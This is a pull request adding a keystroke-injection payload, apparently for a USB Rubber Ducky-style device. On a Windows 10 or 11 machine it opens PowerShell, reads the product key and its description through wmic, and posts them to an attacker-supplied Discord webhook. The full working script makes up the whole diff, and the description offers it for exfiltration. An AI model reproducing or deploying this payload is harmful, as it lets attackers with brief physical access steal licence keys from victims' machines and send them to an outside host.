### PR TITLE
Exfiltrate Windows Product Key

### DIFF
--- a/payloads/library/exfiltration/Exfiltrate_Windows_Product_Key/payload.txt
+++ b/payloads/library/exfiltration/Exfiltrate_Windows_Product_Key/payload.txt
@@ -1,0 +1,46 @@
+* REM ###################################################
+* REM #                                                 |
+* REM # Title        : Exfiltrate Windows Product Key   |
+* REM # Author       : Aleff                            |
+* REM # Version      : 1.0                              |
+* REM # Category     : Exfiltration                     |
+* REM # Target       : Windows 10-11                    |
+* REM #                                                 |
+* REM ###################################################
+
+
+
+QUACK DELAY 3000
+QUACK GUI r
+QUACK DELAY 1000
+QUACK STRING powershell
+QUACK ENTER
+QUACK DELAY 2000
+
+* REM Put here your Discord Webhook, i.e. https://discord.com/api/webhooks/0123456789.../abcefg...
+QUACK STRING $hookUrl = "#DISCORD-WEBHOOK"
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING $exfiltration = @"
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING $(wmic path softwarelicensingservice get OA3xOriginalProductKey)
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING $(wmic path softwarelicensingservice get OA3xOriginalProductKeyDescription)
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING "@
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING $payload = [PSCustomObject]@{
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING content = $exfiltration
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING }
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING Invoke-RestMethod -Uri $hookUrl -Method Post -Body ($payload | ConvertTo-Json) -ContentType 'Application/Json'; exit
+QUACK ENTER


### PR DESCRIPTION
Through this payload, you can export the key information related to the Windows Product Key, knowing its type and the key itself, using a Discord Webhook.